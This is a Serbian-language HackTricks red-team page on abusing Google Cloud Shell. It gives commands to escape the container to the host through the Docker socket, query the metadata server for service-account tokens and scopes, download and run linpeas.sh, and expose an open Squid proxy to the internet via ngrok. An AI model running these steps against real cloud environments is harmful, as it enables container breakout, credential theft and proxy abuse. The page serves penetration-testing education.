Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert) ! Drugi načini da podržite HackTricks:
Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS !
Cloud Shell
Za više informacija o Cloud Shell-u proverite:
GCP - Cloud Shell Enum Bekstvo iz kontejnera
Imajte na umu da Google Cloud Shell radi unutar kontejnera, možete lako pobeći na host tako što ćete uraditi:
Copy sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
Ovo se ne smatra ranjivošću od strane Google-a, ali vam pruža širi uvid u ono što se dešava u tom okruženju.
Takođe, primetite da sa hosta možete pronaći token za servisni nalog:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
Sa sledećim opsegom:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
Nabrajajte metapodatke pomoću LinPEAS-a:
Copy cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
Nakon korišćenja https://github.com/carlospolop/bf_my_gcp_permissions sa tokenom Servisnog naloga nije otkrivena nikakva dozvola ...
Koristite ga kao Proxy
Ako želite da koristite svoju Google Cloud Shell instancu kao proxy, morate pokrenuti sledeće komande (ili ih ubaciti u .bashrc datoteku):
Copy sudo apt install -y squid
Samo da znate, Squid je HTTP proxy server. Kreirajte squid.conf datoteku sa sledećim podešavanjima:
Copy http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all
kopirajte datoteku squid.conf u /etc/squid
Copy sudo cp squid.conf /etc/squid
Konačno pokrenite squid servis:
Copy sudo service squid start
Koristite ngrok da biste omogućili da proxy bude dostupan spolja:
Nakon pokretanja, kopirajte tcp:// URL. Ako želite pokrenuti proxy iz preglednika, predlaže se da uklonite dio tcp:// i port, a port stavite u polje porta postavki proxyja u pregledniku (squid je http proxy server).
Za bolje korišćenje pri pokretanju, .bashrc datoteka treba da sadrži sledeće linije:
Copy sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok ; ./ngrok tcp 3128
Uputstva su kopirana sa https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key . Proverite tu stranicu za druge lude ideje kako pokrenuti bilo kakav softver (baze podataka čak i Windows) u Cloud Shell-u.
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert) ! Drugi načini da podržite HackTricks:
Ako želite da vidite vašu kompaniju reklamiranu u HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS !
Last updated 7 months ago